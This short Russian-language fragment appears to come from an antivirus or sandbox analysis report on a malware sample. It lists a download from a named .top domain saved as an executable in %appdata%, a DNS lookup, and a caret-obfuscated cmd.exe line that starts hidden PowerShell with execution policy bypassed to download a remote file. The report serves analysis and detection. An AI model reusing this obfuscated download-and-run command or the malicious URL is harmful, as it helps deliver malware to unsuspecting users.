Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OweRsH^Ell^.eX^E^ -e^xEC^U^TIO^n^Po^lIcY b^YpASs -^noPr^o^FIlE ^-w^ind^oWST^yl^e HID^d^en (^NEw^-oBj^E^CT^ sYs^teM.^neT.w^eB^C^l^I^Ent).^dow^n^lO^adfILE(^'http://ww...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "P^OweRsH^Ell^.eX^E^ -e^xEC^U^TIO^n^Po^lIcY b^YpASs -^noPr^o^FIlE ^-w^ind^oWST^yl^e HID^d^en (^NEw^-oBj^E^CT^ sYs^teM.^neT.w^eB^C^l^I^Ent).^dow^n^lO^adfILE(^'http://ww...' (со скрытым окном)